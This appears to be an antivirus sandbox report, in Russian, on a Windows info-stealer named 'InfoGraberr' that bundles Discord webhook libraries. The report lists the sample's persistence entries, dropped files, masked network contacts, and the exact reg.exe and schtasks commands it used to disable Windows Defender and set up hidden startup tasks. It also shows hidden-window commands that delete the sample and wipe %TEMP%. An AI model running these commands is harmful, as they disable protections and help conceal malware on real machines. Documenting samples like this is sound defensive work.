Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Host Process for Windows Services' = '"%WINDIR%\SysWOW64\Host Process for Windows Tasks.exe"'
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\microsoft update manager1038282.exe
- <SYSTEM32>\tasks\host process for windows services
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Системный антивирус (Защитник Windows)
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\syswow64\infograberr.exe
- %TEMP%\costura.dotnetzip.pdb.compressed
- %TEMP%\costura.leaf.xnet.dll.compressed
- %TEMP%\costura.microsoft.bcl.asyncinterfaces.dll.compressed
- %TEMP%\costura.netstandard.dll.compressed
- %TEMP%\costura.newtonsoft.json.dll.compressed
- %TEMP%\costura.system.buffers.dll.compressed
- %TEMP%\costura.discord.net.webhook.dll.compressed
- %TEMP%\costura.dotnetzip.dll.compressed
- %TEMP%\costura.system.collections.immutable.dll.compressed
- %TEMP%\costura.system.linq.async.dll.compressed
- %TEMP%\costura.system.memory.dll.compressed
- %TEMP%\costura.system.numerics.vectors.dll.compressed
- %TEMP%\costura.system.runtime.compilerservices.unsafe.dll.compressed
- %TEMP%\costura.system.threading.tasks.extensions.dll.compressed
- %TEMP%\costura.metadata
- %TEMP%\costura.system.drawing.common.dll.compressed
- %TEMP%\costura.system.interactive.async.dll.compressed
- %TEMP%\costura.discord.net.rest.dll.compressed
- %TEMP%\costura.discord.net.core.dll.compressed
- %TEMP%\costura.discord webhook.dll.compressed
- <Текущая директория>\androidemulatoren.exe
- %TEMP%\config
- %TEMP%\whysosad
- %TEMP%\rtkbtmanserv.exe
- %WINDIR%\syswow64\microsoft\host process for windows tasks.exe
- %APPDATA%\microsoft\09-04-2021
- %TEMP%\bfsvc.cfg
- %WINDIR%\syswow64\host process for windows tasks.exe
- %TEMP%\xwizard.cfg
- %TEMP%\winhlp32.exe
- %TEMP%\hh.exe
- %TEMP%\splwow64.exe
- %TEMP%\xwizard.exe
- %TEMP%\snuvcdsm.exe
- %TEMP%\costura.costura.dll.compressed
- %TEMP%\costura.costura.pdb.compressed
- %TEMP%\bfsvc.exe
- %TEMP%\nliap95bhmmr.bat
- nul
Присваивает атрибут 'скрытый' для следующих файлов
- %WINDIR%\syswow64\microsoft\host process for windows tasks.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\infograberr.exe
- %TEMP%\winhlp32.exe
- %TEMP%\splwow64.exe
- %TEMP%\snuvcdsm.exe
- %TEMP%\rtkbtmanserv.exe
- %TEMP%\hh.exe
- %TEMP%\costura.system.threading.tasks.extensions.dll.compressed
- %TEMP%\costura.system.runtime.compilerservices.unsafe.dll.compressed
- %TEMP%\costura.system.numerics.vectors.dll.compressed
- %TEMP%\costura.system.memory.dll.compressed
- %TEMP%\costura.system.linq.async.dll.compressed
- %TEMP%\costura.system.interactive.async.dll.compressed
- %TEMP%\costura.system.drawing.common.dll.compressed
- %TEMP%\costura.system.collections.immutable.dll.compressed
- %TEMP%\costura.system.buffers.dll.compressed
- %TEMP%\xwizard.cfg
- %TEMP%\costura.newtonsoft.json.dll.compressed
- %TEMP%\costura.microsoft.bcl.asyncinterfaces.dll.compressed
- %TEMP%\costura.metadata
- %TEMP%\costura.leaf.xnet.dll.compressed
- %TEMP%\costura.dotnetzip.pdb.compressed
- %TEMP%\costura.dotnetzip.dll.compressed
- %TEMP%\costura.discord.net.webhook.dll.compressed
- %TEMP%\costura.discord.net.rest.dll.compressed
- %TEMP%\costura.discord.net.core.dll.compressed
- %TEMP%\costura.discord webhook.dll.compressed
- %TEMP%\costura.costura.pdb.compressed
- %TEMP%\costura.costura.dll.compressed
- %TEMP%\config
- %TEMP%\bfsvc.exe
- %TEMP%\bfsvc.cfg
- %TEMP%\costura.netstandard.dll.compressed
- %TEMP%\xwizard.exe
Перемещает следующие файлы
- %TEMP%\whysosad в %TEMP%\dav.bat
Сетевая активность
Подключается к
- 'cd#.##scordapp.com':443
- 'ip##pi.com':80
- 'Ch######60753.portmap.host':62240
- 'pa########oison.000webhostapp.com':443
- '91.##4.207.16':80
TCP
Запросы HTTP GET
- http://ip##pi.com/json/
Другие
- 'cd#.##scordapp.com':443
- 'pa########oison.000webhostapp.com':443
UDP
- DNS ASK cd#.##scordapp.com
- DNS ASK ip##pi.com
- DNS ASK Ch######60753.portmap.host
- DNS ASK pa########oison.000webhostapp.com
- DNS ASK it####lvehacker.gq
Другое
Ищет следующие окна
- ClassName: '' WindowName: 'Task Manager'
- ClassName: '' WindowName: ''
- ClassName: 'SysListView32' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\infograberr.exe'
- '%WINDIR%\syswow64\host process for windows tasks.exe'
- '%TEMP%\rtkbtmanserv.exe' ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs7K1hkwid7QpM6WMhV5Dnm8xbrsDkHXdRXl8WYqJnrT9b3nnTbjJjXzFQQzVMrpY5zTKOapp2Jp+2LayZTOVeWhbodCQxEydOhY6UswKy44bctKUGJWFH8r36uXhrrAAcw=
- '%WINDIR%\syswow64\microsoft\host process for windows tasks.exe'
- '%WINDIR%\syswow64\cmd.exe' /C "%TEMP%\dav.bat"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del "%WINDIR%\SysWOW64\InfoGraberr.exe"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /k start /b del /q/f/s %TEMP%\* & exit' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\nlIap95BHmmR.bat" "' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Get-MpPreference -verbose
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\schtasks.exe' /create /tn "Host Process for Windows Services" /sc ONLOGON /tr "%WINDIR%\SysWOW64\MIcrosoft\Host Process for Windows Tasks.exe" /rl HIGHEST /f
- '%WINDIR%\syswow64\cmd.exe' /k start /b del /q/f/s %TEMP%\* & exit
- '%WINDIR%\syswow64\cmd.exe' /K del /q/f/s %TEMP%\*
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\nlIap95BHmmR.bat" "
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /create /tn "Host Process for Windows Services" /sc ONLOGON /tr "%WINDIR%\SysWOW64\Host Process for Windows Tasks.exe" /rl HIGHEST /f
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
- '%WINDIR%\syswow64\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del "%WINDIR%\SysWOW64\InfoGraberr.exe"
- '%WINDIR%\syswow64\choice.exe' /C Y /N /D Y /T 3
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\chcp.com' 65001
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\cmd.exe' /C "%TEMP%\dav.bat"
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\ping.exe' -n 10 localhost
